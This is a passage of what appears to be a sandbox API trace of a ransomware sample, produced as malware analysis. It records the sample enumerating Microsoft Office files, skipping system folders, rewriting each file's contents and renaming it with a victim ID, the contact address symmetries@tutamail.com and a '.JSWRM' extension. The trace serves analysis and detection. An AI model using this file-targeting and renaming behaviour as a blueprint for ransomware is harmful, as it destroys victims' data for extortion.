HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0101.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0101.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0101.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0101.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f5f8 [0101.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0101.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.807] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.osmmui.msi.16.en-us.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.osmmui.msi.16.en-us.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.osmmui.msi.16.en-us.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.osmmui.msi.16.en-us.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0101.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0101.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0101.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.808] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd26acf16, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd26acf16, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd28c2fa3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x906, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml", cAlternateFileName="C22C6F~1.XML")) returned 1 [0101.808] lstrcmpiW (lpString1="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml", lpString2=".") returned 1 [0101.808] lstrcmpiW (lpString1="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml", lpString2="..") returned 1 [0101.808] lstrcmpiW (lpString1="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml", lpString2="...") returned 1 [0101.808] lstrcmpiW (lpString1="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml", lpString2="windows") returned -1 [0101.808] lstrcmpiW (lpString1="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml", lpString2="recovery") returned -1 [0101.808] lstrcmpiW (lpString1="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml", lpString2="perflogs") returned -1 [0101.808] lstrcmpiW (lpString1="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml", lpString2="documents and settings") returned -1 [0101.808] lstrcmpiW (lpString1="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.808] lstrcmpiW (lpString1="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml", lpString2="system volume information") returned -1 [0101.808] lstrcmpiW (lpString1="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml", lpString2="msocache") returned -1 [0101.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0101.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0101.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0101.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml", cchWideChar=48, lpMultiByteStr=0x20d770, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml", lpUsedDefaultChar=0x0) returned 48 [0101.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0101.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0101.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0101.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0101.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml", cchWideChar=48, lpMultiByteStr=0x20d920, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml", lpUsedDefaultChar=0x0) returned 48 [0101.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0101.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0101.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0101.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dff8 [0101.809] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.osmux.osmux.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0101.809] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=2310) returned 1 [0101.809] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x900) returned 0x20c6c0 [0101.809] ReadFile (in: hFile=0x45c, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x900, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345ec04*=0x900, lpOverlapped=0x0) returned 1 [0101.811] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.811] WriteFile (in: hFile=0x45c, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345ec00*=0x900, lpOverlapped=0x0) returned 1 [0101.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0101.811] CloseHandle (hObject=0x45c) returned 1 [0101.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0101.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0101.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0101.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0101.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0101.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0101.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0101.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0101.812] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.osmux.osmux.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.osmux.osmux.x-none.msi.16.x-none.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0101.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0101.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dff8 | out: hHeap=0x1e0000) returned 1 [0101.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0101.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0101.816] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd356d87a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd356d87a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd362c40f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2b8a, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2RManifest.osmuxmui.msi.16.en-us.xml", cAlternateFileName="C21C45~1.XML")) returned 1 [0101.817] lstrcmpiW (lpString1="C2RManifest.osmuxmui.msi.16.en-us.xml", lpString2=".") returned 1 [0101.817] lstrcmpiW (lpString1="C2RManifest.osmuxmui.msi.16.en-us.xml", lpString2="..") returned 1 [0101.817] lstrcmpiW (lpString1="C2RManifest.osmuxmui.msi.16.en-us.xml", lpString2="...") returned 1 [0101.817] lstrcmpiW (lpString1="C2RManifest.osmuxmui.msi.16.en-us.xml", lpString2="windows") returned -1 [0101.817] lstrcmpiW (lpString1="C2RManifest.osmuxmui.msi.16.en-us.xml", lpString2="recovery") returned -1 [0101.817] lstrcmpiW (lpString1="C2RManifest.osmuxmui.msi.16.en-us.xml", lpString2="perflogs") returned -1 [0101.817] lstrcmpiW (lpString1="C2RManifest.osmuxmui.msi.16.en-us.xml", lpString2="documents and settings") returned -1 [0101.817] lstrcmpiW (lpString1="C2RManifest.osmuxmui.msi.16.en-us.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.817] lstrcmpiW (lpString1="C2RManifest.osmuxmui.msi.16.en-us.xml", lpString2="system volume information") returned -1 [0101.817] lstrcmpiW (lpString1="C2RManifest.osmuxmui.msi.16.en-us.xml", lpString2="msocache") returned -1 [0101.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0101.817] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.osmuxmui.msi.16.en-us.xml", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0101.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.817] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.osmuxmui.msi.16.en-us.xml", cchWideChar=37, lpMultiByteStr=0x22d0a0, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.osmuxmui.msi.16.en-us.xml", lpUsedDefaultChar=0x0) returned 37 [0101.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0101.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22be00 [0101.817] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.osmuxmui.msi.16.en-us.xml", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0101.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.817] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.osmuxmui.msi.16.en-us.xml", cchWideChar=37, lpMultiByteStr=0x22cdc8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.osmuxmui.msi.16.en-us.xml", lpUsedDefaultChar=0x0) returned 37 [0101.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22be00 | out: hHeap=0x1e0000) returned 1 [0101.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b448 [0101.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0101.817] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.817] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0101.817] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.osmuxmui.msi.16.en-us.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.osmuxmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0101.818] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11146) returned 1 [0101.818] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2b80) returned 0x24d210 [0101.818] ReadFile (in: hFile=0x45c, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2b80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345ec04*=0x2b80, lpOverlapped=0x0) returned 1 [0101.820] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.820] WriteFile (in: hFile=0x45c, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2b80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345ec00*=0x2b80, lpOverlapped=0x0) returned 1 [0101.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0101.820] CloseHandle (hObject=0x45c) returned 1 [0101.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0101.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0101.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0101.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0101.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0101.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f848 [0101.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0101.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0101.820] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.osmuxmui.msi.16.en-us.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.osmuxmui.msi.16.en-us.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.osmuxmui.msi.16.en-us.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.osmuxmui.msi.16.en-us.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0101.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0101.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0101.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.821] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd257bc65, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd257bc65, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd276bb03, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x17194, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml", cAlternateFileName="C29151~1.XML")) returned 1 [0101.821] lstrcmpiW (lpString1="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml", lpString2=".") returned 1 [0101.821] lstrcmpiW (lpString1="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml", lpString2="..") returned 1 [0101.821] lstrcmpiW (lpString1="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml", lpString2="...") returned 1 [0101.821] lstrcmpiW (lpString1="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml", lpString2="windows") returned -1 [0101.821] lstrcmpiW (lpString1="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml", lpString2="recovery") returned -1 [0101.821] lstrcmpiW (lpString1="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml", lpString2="perflogs") returned -1 [0101.821] lstrcmpiW (lpString1="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml", lpString2="documents and settings") returned -1 [0101.821] lstrcmpiW (lpString1="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.822] lstrcmpiW (lpString1="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml", lpString2="system volume information") returned -1 [0101.822] lstrcmpiW (lpString1="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml", lpString2="msocache") returned -1 [0101.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0101.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0101.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0101.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml", cchWideChar=52, lpMultiByteStr=0x20dde8, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml", lpUsedDefaultChar=0x0) returned 52 [0101.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0101.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0101.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0101.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0101.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml", cchWideChar=52, lpMultiByteStr=0x20dba8, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml", lpUsedDefaultChar=0x0) returned 52 [0101.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0101.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0101.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b448 | out: hHeap=0x1e0000) returned 1 [0101.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0101.822] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.outlook.outlook.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0101.822] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=94612) returned 1 [0101.822] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, 